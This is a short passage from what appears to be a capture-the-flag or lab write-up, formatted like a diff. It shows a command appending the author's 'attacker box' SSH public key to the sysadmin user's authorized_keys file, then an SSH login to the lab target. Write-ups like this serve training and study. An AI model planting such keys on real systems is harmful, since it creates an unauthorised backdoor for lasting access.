Box Information

 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMjIupyWtjNs4Cq2PFufHj8NO/u4Sf3EQH+oXs6FwUYQ5nMOcHF2c3B+KdsLlKqSloN/uZsvPaJe+U8nnHsN7U6K6ulhfHOkoha9CkJsXheWmHiMbPODY2SuSiOER7anSQyhDfkE7ICw2pPPwRZ/6wFA4MCbXsqveDhpn3Mc1NUq+EAT2gXaMk0LQhJYJd+160Ff37a0MYaqnLiOBK4l7G5WFiQFKHL/6a8Zdym5pW/O9PO9Zs0oeK/o9xMJStYCdgzrIEjbE5b4DNwTM5slRs7tBymFP90V13UqT4oUI8eX7Q7fkL8fNCDfYbWDucnbjSPG6KhUWaI77fjupXJfKOfDHIlYQxUBgpklI0o2fSKXVMeuiflyj4hropd4LnAw/k7OQZXBdE4CJyxuTRsx5+HW2SgeLoD9JvS2yfdVVEjGh1/Om7bAWhiKUfGVEfiXeJfPJRbuxNmUxiGs5weOws0/+Z76VakbPEd8rJnWjx7LShsUl8NnGuILyLbppfYTc= matesz@MLKali" >> /home/sysadmin/.ssh/authorized_keys

-I used ssh from my attacker box to connect to the target as sysadmin
+I used ssh from my attacker box to connect to the target as sysadmin.

 ssh -i $HOME/.ssh/id_rsa sysadmin@10.10.10.181